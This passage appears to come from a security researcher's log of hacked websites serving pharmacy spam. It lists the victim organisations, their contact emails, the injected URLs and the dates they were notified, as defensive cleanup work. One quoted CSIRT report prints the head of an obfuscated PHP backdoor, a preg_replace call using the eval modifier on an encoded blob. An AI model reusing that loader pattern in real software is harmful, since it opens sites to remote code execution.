https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CGgQFjAF&url=http%3A%2F%2Fwww.theoriginalscrapbox.com%2Fapp%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNFjTsOqDiUp6a69N_jQ55x6TPLzKw&sig2=7azPXBhIA8JoaAc88fokuQ&bvm=bv.57155469,d.cGU
Hit 7. www.capitolcorridor.org
A train in Oakland, CA
http://mygov.us/task/city/knowledge_base/submit_request.php?cityname=368&module=rt

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CG8QFjAG&url=http%3A%2F%2Fwww.capitolcorridor.org%2Fabout_ccjpa%2F%3Fy2fwa%3D427441&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNERTepzJQanRWT-wJJwcoCH_mIxag&sig2=53YLw06eTrqji6hTxghprA&bvm=bv.57155469,d.cGU
Hit 13. ohsweb.ohiohistory.org
Ohio Historical Society
collections@ohiohistory.org
http://www.ohiohistory.org/about-us/contact/website

Notified 11-28-13

http://ohsweb.ohiohistory.org/strocs/
Hit 18. www.caratsmartdiamonds.com
abuse@godaddy.com
ahadany@cox.net
abuse@caratsmartdiamonds.com
security@caratsmartdiamonds.com

Notified 11-28-13

www.caratsmartdiamonds.com/buy-levitra-overnight/
Hit 20. primogrill.com
http://primogrill.com/contact/

Notified 11-29-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIoBEBYwCTgK&url=http%3A%2F%2Fprimogrill.com%2Fcategory%2Fbuy-levitra-uk%2F&ei=uriXUqLYHJTnoAS3l4GwBA&usg=AFQjCNH9WoyKVZ976hSgxrPgXjNfPmCAQA&sig2=3-qDh5IgEOazWlZ_11l8sQ&bvm=bv.57155469,d.cGU

19. More inside information and Base64-encoded data (11-29-13)

Richard Hook from the New England Antiquities Research Assn. sent me this report:
For my part on the near.org web site I have replaced the rogue .htaccess file and deleted two files that it pointed to. I am not enough of a hacker to know how to proceed from here.

James Cleeter from Janet CSIRT sent this to me:
"Did a Nessus scan of the box earlier. It found... Web Server Generic XSS Description The remote host is running a web server that fails to adequately sanitize request strings of malicious JavaScript. By leveraging this issue, an attacker may be able to cause arbitrary HTML and script code to be executed in a user's browser within the security context of the affected site."

Some of the modules for the CMS software seem to have been recently replaced. Some of the directories within ~/stecon/WWW/modules/ are new and are owned by www-data (Yes, apache shouldn't have been able to write there: first of probably many apologies from me). In particular, the file ~/stecon/WWW/modules/nuSOAP/nuSOAP.module.php now had a 20K block of multiply-encrypted code at the start. I include below the results of base64-decoding the code.

preg_replace("/IwOIddDwZObky1eqwBAZlfY/e", "tdwoOjAFLo6kk2xR0Edy2OWnj5UI7MsoqeS6DT=P96zhwmzuqRhhg5JEydNtq7WVapQd9Qs6Lh c8IQryiOVEIeJ79WonRA0rpPKmf3hqZ=nhQTVyhq3pKBkHXOvpOuV40ffdXCJwBwTREoFmU9Qe0 2mVEW=SGVLE2qiNtr=ucTBh8GIRDYwCPXXTuXm1sx5jdcxLJw7lE8IBDQSHpDJ5bhNK6z=nm5LE V9QfuMGyJO1MfIUJMeDnARy7GxisruxCrChaOnOY2EkVM6fZYjCZ11U7m4oSmaUTd2use0FUCqq PkKp9trXjgseHkHaMivfAmPsFNyaQdFfCQJA=1YiWFCeqK63spXsRmaX1NxFq4ltJvtIlGq8Mta 34Uuk=GSQtsni7aolTOUc0DkjKQfW07N3P8bPDtfwbIUWj993MRUKU6ufKP2JKEAaAcpELK2mSK 03I7uUNDei9OCId4Sn8TC9vsC734iJCgBLbvfpz=MxNO7qHNTEgWCRDEN68vE=QGLr2qWqqic5x Xj6k40GOBYSFlNCVSClYNSP5o6kLWd0tB4T62aJ3yc9Yp=t9CTWQllKPgua3MYlOQ6IHUS=Iu8g Y8PW=jsPKTZZzI1rUOSieMrmh0lpsiLGface0KuJdIiRRX0llQJFd2s=zTph21nWQF1PQjYts8A 0T0k6Ot=rjsrYAV63LiNcnCs4mGmTCmRWl2Q1kQhJ9Oh9kczv=CNnE6grBH=DuRZVIqKt7s357Z 3f3rQ2tddyY0eZGdd2v3L4iWmeDdX04Pdv7tloMEblD7=KYcAJULC4hoWkHujA0Bv5vVi9a=id6 hnT=ncUzeMWHj8PSfPRh=LSVtPvsxNnU27UeXoT32p=alOtGd=odK7y5Kim9vORmJlFhPYZFDYf pnNvGNZjXUWRf54cpGtRQTWyivMoylJcNXNUkm498PObIH4yOmEe6bSdMfH=FQcTopnNRfLNvao 4hhrwIwPDNigZCnZH52bhgDvyj7ATWpM5M5pUp6X4c5SehrmaiC9EGs3po40AiK5uDiDtcbl5U4 Y2k=RICPMI9Exm9wmf7fP=CSsfuTZDMx6xxM6zbG8YLu=IglobG4aJLIo6cC0pz5bmFVahcX6nH 6wngZEnRfwdnZXFcWuRPK4VgT39qxlysWbNwf1D=mgnB5sdPbufmn1H7sEmeqaLC2ZyVP2V2W93 PpVfGF=ss1zoh5QAkrMmhmZ43QOtmLk327W8AWptLdWsXnt8T7i2i9uZN9H1Jss=nE8nalWmEsT cVCYp98fg6O6HMC9VupVXtRAJ3Wv8EEYZGxEEujkoyfw=huVRYqpH8pQzBAwGFJgL8kQqI1U8VF 74zRKN8zU5elsgmdmrnH3jrIP10jwTpsLd0Vr7KAzomgJN=w5n4wMk5ba3ALLp5XI3t1x41mhbH rpHdiuVU87NYVFYhRDaoMSXBFQ3rxTze978gqS1nNDAjJZFacfEpybq4rije2X0zT6U=NKmbNn= XBExek3IXSzP=WzeNMcBfXWflgHBuuAGvF5OpvWCDLRChGhuS0wyWHS8nZ9WI0d5DWItGfvJqCM MIt8assNEzgAc60zD9R9AoFuuke5PgGcozYEhFSl6ymXtlLxidujGzS2ZwuoS1F8peAMkSxeGZ2 z=CmifVGmKYcjJMNbCTYrxY4Xrq2xFsmEvNmQjt3tGTSQggsizFOmdH0Ky184ij9SwkiUSaDYuW oP4VxsaBT5JSD8HA1qjy0VXhqq8tEqFt69Dspet0Y3QczYcpDBcBW1iBffvjK2RFzVxe1gcOYtq NGI3KJTMfIvhoPRNaIfg81Taqz35NkjarrR31lDVuy3XDJkdRE0O6SokGgdUGCuxuBojms6Vgxt 

20. More Top Hits (11-30-13)

More very general searches as specified below
Organization Emails Malicious URL

Hits for "Viagra"

Hit 11. kim-stafford.com
Writer in Oregon
Whois leads to:
abuse@godaddy.com
krs@lclark.edu

Reported on 11-30-13

http://kim-stafford.com/?lze=810
Directly hosted page
Hit 31-21. rvrphoto.com
Photography in Ohio
rkoti@me.com
abuse@godaddy.com
vamsi@vam.si

Reported on 11-30-13

http://rvrphoto.com/www-viagra-sales/
http://rvrphoto.com/ed-50mg-viagra/
Linked from an infected page: bioimagexd.net
Open Source Medical Imaging Software
info@bioimagexd.net
support@netfirms.com
lassi.paavolainen@jyu.fi

Reported on 11-30-13

http://www.bioimagexd.net/www-viagra-uk/
http://www.bioimagexd.net/on-viagra-spain/
http://www.bioimagexd.net/www-buy-viagra-on-the-internet/
http://www.bioimagexd.net/med-50mg-viagra/
Linked from an infected page: annehills.com
Singer
booking@annehills.com
anne@annehills.com
abyse@web.com
annehills@juno.com
mark-web@singout.org
robbietrapp@hotmail.com

Reported on 11-30-13

http://www.annehills.com/md-cheap-viagra-from-canada/
Hit 33: thejameshouse.org
Help for persons who have been sexually abused, in Virginia
chana@thejameshouse.org
jane@thejameshouse.org

Reported on 11-30-13

http://thejameshouse.org/?an=784
Hit 34: africanamericansoul.com
abuse@godaddy.com
AFRICANAMERICANSOUL.COM@domainsbyproxy.com

Reported on 11-30-13

http://africanamericansoul.com/?jnk=284
Hit 35: dfma.org
Durham FM Association
http://dfma.org/index.php?option=com_contact&view=contact&id=1&Itemid=24

Reported on 11-30-13

http://dfma.org/?yx=795
Hit 36: jasonshaeffer.com
support@netfirms.com
jasonshaeffer@gmail.com

Reported on 11-30-13

http://jasonshaeffer.com/web-viagra-rx/
Hit 37: sikorskyarchives.com
CT
iisha@snet.net
LIBERTINO481@YAHOO.COM
abuse@godaddy.com
johnmk26@optonline.net

Reported on 11-30-13

http://www.annehills.com/md-cheap-viagra-from-canada/
Hit 39: gingergrayhamartgallery.com
Site looks abandoned since 2002
josh@coyote-canyon.com
abuse@wildwestdomains.com
GINGERGRAYHAMARTGALLERY.COM@domainsbyproxy.com

Reported on 11-30-13

http://gingergrayhamartgallery.com/?ib=629
Hit 40. www.abeewell.com
Registered in Russia, no real website, no one to notify

http://www.abeewell.com/

Hits for "Cialis"

Hit 11. huwib.org
Harvard Undergraduate Women in Business, On-Campus, Harvard, MA
kshankar@huwib.org
rwang@huwib.org
hlim@college.harvard.edu
info@huwib.org

Reported on 11-30-13

http://huwib.org/?mfh=798
Hits 12-16. seamass.org
Structural Engineers Association of MA
Contact page missing, but Google cache has one from Nov. 1, 2013
Officers page missing
About page missing

Google says "This site may be hacked"

info@seamass.org
president@seamass.org
david@technicalsol.com

Reported on 11-30-13

http://www.seamass.org/cialis-action/
http://www.seamass.org/the-cialis-commercial/
http://www.seamass.org/dr-cialis/
http://www.seamass.org/a-cialis-dosage/
http://www.seamass.org/cialis-in-botlle/
Hits 17-21. honorflighttwincities.org
MN
crazyjerry45@hotmail.com
abuse@honorflighttwincities.org
security@honorflighttwincities.org

Reported on 11-30-13

http://honorflighttwincities.org/a-carvedilol-cialis/
http://honorflighttwincities.org/ed-cialis-action/
http://honorflighttwincities.org/a-cialis-action/
http://honorflighttwincities.org/now-5mg-cialis/
Hit 23. musehousecenter.com
musehousecenter@gmail.com
abuse@web.com
em@a2pwebdesignn.com
webmaster@a2pwebdesignn.com

Reported on 11-30-13

http://musehousecenter.com/?pav=852
Hit 25. laennecsocietyphilly.org
laennecsocietyphilly.org/cialis-pills/
Home page hacked, and many others, including the contact page
Hit 26. krcs.org
The Kansas Respiratory Care Society
suzanne.bollig@haysmed.com
curtis.kidwell@viachristi.org
dconyers@kumc.edu

Reported on 11-30-13

http://krcs.org/?mu=957
Hit 28. shoplocalunioncounty.org
info@shoplocalunioncounty.org
ispwebmaster@nrtc.coop
ispwebmaster@nrtc.org

Reported on 11-30-13

http://shoplocalunioncounty.org/?yh=655
Hit 29. lindsay-stern.com
lstern13@amherst.edu
editor@scramblerbooks.com

Reported on 11-30-13

http://lindsay-stern.com/?sx=701
Hit 36. kayakcentre.com
RI
funn@kayakcentre.com
abuse@web.com

Reported on 11-30-13

http://kayakcentre.com/?nlc=4
Hits 37-38. www.ncherm.org
Safer Schools in PA
brett@ncherm.org
daniel@atixa.org
kate@ncherm.org

Reported on 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=37&ved=0CGUQFjAGOB4&url=http%3A%2F%2Fwww.ncherm.org%2F%3Fid%3D523163&ei=CWGaUrnQIMzmoATosYGgBA&usg=AFQjCNH364-8GMxasYfp3NRR-O28jyCYGg&sig2=a-YGpqrOUYHMwpyafcBnlQ&bvm=bv.57155469,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=38&ved=0CGwQFjAHOB4&url=http%3A%2F%2Fwww.ncherm.org%2F%3Fid%3D523146&ei=CWGaUrnQIMzmoATosYGgBA&usg=AFQjCNEaX0pKE5rm6vgGxLnaawb7nc5HrA&sig2=Evx-gEJC8Ft29ZMuCLDcWw&bvm=bv.57155469,d.cGU

Hits for "Levitra"

Hit 20. elupton.com
Art critic in NYC, works at the Smithsonian
abuse@web.com
cooperhewittpress@si.edu
cheducation@si.edu

Reported on 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIwBEBYwCTgK&url=http%3A%2F%2Felupton.com%2Flevitra-online-shopping%2F&ei=anSaUt23CcL3oATa64DQCw&usg=AFQjCNHCTfQkSNjiD1Pg277HR2mkACDLiQ&sig2=aGO9sPWuMV-iTEKkLQJYpA&bvm=bv.57155469,d.cGU&cad=rja
Hit 24. nintendoeverything.com
http://nintendoeverything.com/contact-us/

Informed on 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CE8QFjADOBQ&url=http%3A%2F%2Fnintendoeverything.com%2Flevitra-overnight%2F&ei=EHeaUt3CGNDhoAScmoLoDA&usg=AFQjCNGUMuBxkohDi73l49gNteVswgpZwA&sig2=A9K4p0NwxpKirvLQiR-VLw&bvm=bv.57155469,d.cGU
Hit 32. www.thesmell.org
Los Angeles Art Space
http://www.thesmell.org/contact

Informed on 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CE0QFjABOB4&url=http%3A%2F%2Fwww.thesmell.org%2F&ei=YnmaUv6wN4n3oASg5ICoCA&usg=AFQjCNFyvDQw020irw1tkS0kbveE9cYflw&sig2=3iknvwdTneGHEMpZHtGWtg&bvm=bv.57155469,d.cGU

Hits for "buy oxycontin online"

Hit 37. gravatar.com
compliance@markmonitor.com
domains@automattic.com

Informed on 11-30-13

gravatar.com/seroxycontiner
Hit 47. www.wpda.org
World Parkinson Disease Association
info@wpda.org
aip@fondazioneparkinson.com
gianluca@parkinson.it
support@register.it

Informed on 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=47&ved=0CFoQFjAGOCg&url=http%3A%2F%2Fwww.wpda.org%2Fappuntamenti.html&ei=UH6aUrvEA8zjoAT4lIKQDw&usg=AFQjCNGNQuJ5VcTxDyyoJnGod70cYSlNKA&sig2=1pKfr7eeBoHHgZb4ARetzw&bvm=bv.57155469,d.cGU

Hits for "buy oxy"

Hit 25. https://archive.org/
info@archive.org

Informed on 11-30-13

https://archive.org/details/Oxy5Mg30Mg

Hits for "vardenafil"

Hit 26. hugetheater.com
butch@hugetheater.com
jill@hugetheater.com

Contacted 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=26&ved=0CFoQFjAFOBQ&url=http%3A%2F%2Fwww.hugetheater.com%2Fabout-us%2Fdonate%2F&ei=tZ6aUsa8DZbcoASHvICYCA&usg=AFQjCNHIvCeV7jqz6PPDQW-gGhSuCOi3Fg&sig2=dhKAVGdbEftOyy58dQMYYA&bvm=bv.57155469,d.cGU
Hit 29. thedeadexs.com
info@thedeadexs.com

Informed on 11-30-13

http://thedeadexs.com/vardenafil/
Hit 32. actualidad7.com
ad@actualidad7.com
redaccion@actualidad7.com

Informed on 11-30-13

http://actualidad7.com/cheapest-vardenafil/
Hit 33. aceita.com.br
negocios@aceita.com.br
suporte@aceita.com.br

Informed on 11-30-13

http://aceita.com.br/vardenafil-hcl-20mg/
Hit 38. larryelmore.com
sales@larryelmore.com

Informed on 11-30-13

http://larryelmore.com/vardenafil-cheapest/

Hits for "284-3222"

Hit 7. www.whereisasturias.com
Twitter: @whereisasturias

Informed 12-1-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CF8QFjAG&url=http%3A%2F%2Fwww.whereisasturias.com%2Fcanada%2F%3Fa%3D322&ei=eJabUsr-KIXUoASo-YLIAQ&usg=AFQjCNE0qR8SUJi4t9Qr_I7c2yypUR0LmQ&sig2=COhUDi7uTC6VtrrA77EKig&bvm=bv.57155469,d.cGU
Hit 8. www.nlsd113.com
Northern Lights School Division, Canada
centraloffice@nlsd113.net
suboffice@nlsd113.net

Informed 12-1-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGYQFjAH&url=http%3A%2F%2Fwww.nlsd113.com%2Frr%2Findex.php%3Fp%3D859&ei=eJabUsr-KIXUoASo-YLIAQ&usg=AFQjCNEhHshG2GZ5KQAapm1uGpcm9JfyOw&sig2=Iu19xuS3akpXaZcswkP5HA&bvm=bv.57155469,d.cGU

Hits for "buy armidex"

Hit 1. healthyagingcouncil.org unthsc.edu
U. of N. Texas
UNTSweb@untsystem.edu
webmaster@unthsc.edu
urcm@unt.edu

Informed 12-1-13

http://www.healthyagingcouncil.org/getarimidex/
Hit 5. www.purevolume.com
Music promoter
randy@purevolume.com
vchang@spinmedia.com
brittany@purevolume.com

Informed 12-1-13

http://www.purevolume.com/arimidex
Hit 6. www.zestcreative.ie
Design co. in Ireland
info@zestcreative.ie

Informed 12-1-13

http://www.zestcreative.ie/rev/.svn/arimidex.html
Hit 9. flavors.me
http://us.moo.com/help/contact-us.html

Informed 12-1-13

http://flavors.me/midelle
Hit 10. www.bainesdesign.co.uk
info@bainesdesign.co.uk
hello@barleyhousegroup.co.uk

Informed 12-1-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CIYBEBYwCg&url=http%3A%2F%2Fwww.bainesdesign.co.uk%2F%3Fp%3Dbuy-arimidex%26k%3D5&ei=KpqbUvb6LofooASFjYGoAw&usg=AFQjCNEYQD_mcQ8rfHm4V2z1Uy0Yr6qnWA&sig2=5oDKCKKgEsK5_ZUaLwRxvQ&bvm=bv.57155469,d.cGU
Hit 14. cafemomentum.org
Restaurant in Dallas, TX
jef@tingleycomm.com
chad@cafemomentum.org

Informed 12-1-13

http://cafemomentum.org/products/buyarimidex/
Hit 20. kingamplification.com
Guitar store in CA
val@kingamplification.com

Informed 12-1-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIcBEBYwCTgK&url=http%3A%2F%2Fkingamplification.com%2Farimidex.html&ei=PaKbUrKTKI7roAT0kYDYBw&usg=AFQjCNFUQIlb--0VoKgKXsusVsfjpqGBOQ&sig2=prWvmOykCCSfC0ksfpBjTg&bvm=bv.57155469,d.cGU

21. .GOV Sites (12-12-13)

Today on Twitter I saw this:
Mustafa Al-Bassam
@musalbas
Why is the U.S. government running an online Canadian Viagra store? chambersburgpa.gov/oldwebsite/


Bill Schnift
@BillSchnift
@musalbas @sambowne loves this stuff.
Indeed I do!
Organization Emails Malicious URL

Hits for "inurl:.gov intitle:viagra"

Hit 3. www.winchester-in.gov
City of Winchester, Indiana
druss@egovstrategies.com
mayor@winchester-in.gov

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CEUQFjAC&url=http%3A%2F%2Fbuy-viagra.winchester-in.gov%2F937.html&ei=WwWqUqSpO4XdoASlyILYDQ&usg=AFQjCNGTNFay1K9j6b7W9uI3HqhZ_pSQIQ&sig2=Aq9hfsg6_DwPIowI2IL4HQ&bvm=bv.57967247,d.cGU
Only visible from Google link
Hit 5. www.gsnmagazine.com
Government Security News
jgoodwin@gsnmagazine.com
mccabe@gsnmagazine.com

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CFMQFjAE&url=http%3A%2F%2Fwww.gsnmagazine.com%2Fnode%2F28233%3Fz3nub%3D414895&ei=WwWqUqSpO4XdoASlyILYDQ&usg=AFQjCNGC21DO-QJCwCECr0p9hiCnqK4AkA&sig2=l71g5B7a2Jzbb6EjaLwv1w&bvm=bv.57967247,d.cGU

Hits for "inurl:.gov intitle:viagra" (Region: US)

Hit 11. rivnet.com
Riviera Telephone Co., Texas
rtc.ofc@rivnet.com
rtc@rivnet.com

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CDYQFjAAOAo&url=http%3A%2F%2Frivnet.com%2Ffiles%2Fgov-uk-buy-viagra.html&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNFLOrW37ODZoFuG3Upsrcbp38DkYw&sig2=Q64ynabmgfQj_kcQNtZHng&bvm=bv.57967247,d.cGU
Hit 13. www.s-5.com
Roofing company in Colorado
info@s-5solutions.com
info@30dps.com

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CEYQFjACOAo&url=http%3A%2F%2Fwww.s-5.com%2Fscm%2Fscm%2Fwestminster-gov-uk-viagra%2F&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNFYstWR-jxhLGG__fAGOPwjcnJswA&sig2=UhmmzrF23qIqnR9flmvAWw&bvm=bv.57967247,d.cGU
Hit 17. www.wmuseumaa.org
Westmoreland Museum, PA
info@wmuseumaa.org
membership@wmuseumaa.org

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CGYQFjAGOAo&url=http%3A%2F%2Fwww.wmuseumaa.org%2Frfq%2Fwestminster-gov-uk-viagra%2F&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNH08xGofrj02rLKbF9IkLdQAh6h6Q&sig2=FY1z4oNR7GqcbEF9vTHv_g&bvm=bv.57967247,d.cGU
Hit 30. www.jamescitycountyva.gov
James City County VA
County.Administration@jamescitycountyva.gov
jccnews@jamescitycountyva.gov

Reported on 12-12-13

http://www.jamescitycountyva.gov/online-viagra/
Hit 44. www.intgovforum.org
Internet Governance Forum
igf@unog.ch

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=34&ved=0CEMQFjADOB4&url=http%3A%2F%2Fwww.intgovforum.org%2Fcms%2Fdynamic-coalitions%2F72-ibr%3Faw50z%3D270581&ei=3g-qUr-4LNPdoAS5hID4DA&usg=AFQjCNG-CKzx7BiMANwYbjCY1Z3PrVmfWQ&sig2=k2i9iFMcwfgJfY2nPgm4iA&bvm=bv.57967247,d.cGU
Hit 57. chambersburgpa.gov
jwright@chambersburgpa.gov
plagiovane@chambersburgpolice.com
boroadmin@chambersburgpa.gov

Reported on 12-12-13

http://www.chambersburgpa.gov/oldwebsite/
Hit 71. fabius-ny.gov
Town of Fabius, N.Y.
webmaster@fabius-ny.gov
townclerk@fabius-ny.gov

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=62&ved=0CDIQFjABODw&url=http%3A%2F%2Fbuy-viagra.fabius-ny.gov%2F71.html&ei=BBKqUsvAIcP1oASjxIDoDQ&usg=AFQjCNFY_LNW_o_XwssjGWxPGA6YS2zzFQ&sig2=OAlm2-pKTZKBrTMgSzNYjQ&bvm=bv.57967247,d.cGU


Changelog

Posted 2:22 PM 11-9-13 by Sam Bowne
"More Infected Servers" added 1:37 pm 11-10-13
Results posted 6:10 pm 11-12-13
Another round of notifications 11-15-13
Chatham added 8:41 PM 11-15-13
Infections tested 5 pm 11-16-13
Directory and further BYU analysis added 1:36 PM 11-18-13
Chatham update 3:13 pm 11-19-13
Twitter notification update 4:02 PM 11-19-13
Nineteen more section added, page rearranged 12:19 pm 11-20-13
Updated with fixes 2:16 PM 11-20-13
"39 more" added 11-21-13 7:41 am
"8 more" and "Removal Tips from KWC" added 11-21-13 3:06 PM
Item 10 added 8:12 PM 11-22-13
Items 11 and 12 added 4 PM 11-23-13
Item 13 added 11-25-13
Note added to item 13 11-27-13
Item 18 added 11-28-13 and 11-29-13
Item 19 added 11-29-13
Item 20 added 11-30-13
More repair information added to item 5 12-2-13
Item 5 updated with colors, Twitter handles, and new repair info 12-4-13
Item 21 added 11:53 am 12-12-13
Item 5 updated 7-19-14